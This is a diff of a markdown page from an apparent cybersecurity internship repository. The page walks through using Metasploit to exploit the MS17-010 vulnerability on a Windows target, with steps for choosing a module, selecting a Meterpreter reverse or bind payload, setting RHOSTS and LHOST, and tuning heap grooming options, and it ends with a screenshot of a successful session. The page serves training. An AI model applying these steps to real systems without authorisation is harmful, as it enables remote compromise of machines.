aaronamran/MCSI-Remote-Cybersecurity-Internship/Security Tools/metasploit.md

 3. Choose a module.
 For automatic modules, simply enter `use 0`.
 Note that since no payload was configured, it defaults to `windows/x64/meterpreter/reverse_tcp`
 4. Enter `show payloads`, and choose a payload number 26 `payload/windows/x64/meterpreter/bind_tcp_rc4`
 5. To set the target's IP address, enter `show options` and `set RHOSTS <target_IP_address>`
+6. Ensure the local machine's IP address is correct, otherwise set it using the `set LHOSTS <local_ip_address>` command
-6. (Optional) Enter `set GroomAllocations 10` and `set GroomDelta 5` for controlling how memory is arranged on the target computer during an exploit.
+7. (Optional) Enter `set GroomAllocations 10` and `set GroomDelta 5` for controlling how memory is arranged on the target computer during an exploit.
 GroomAllocations decides how many memory spaces the exploit creates to prepare the computer's memory, while GroomDelta fine-tunes the size of the memory spaces

 Screenshot of Metasploit successfully exploiting MS17-010 vulnerability with an active Meterpreter session shown below: <br/>
 ![image](https://github.com/user-attachments/assets/6c8cfafb-7834-4b86-8c90-dbfe87114ffe)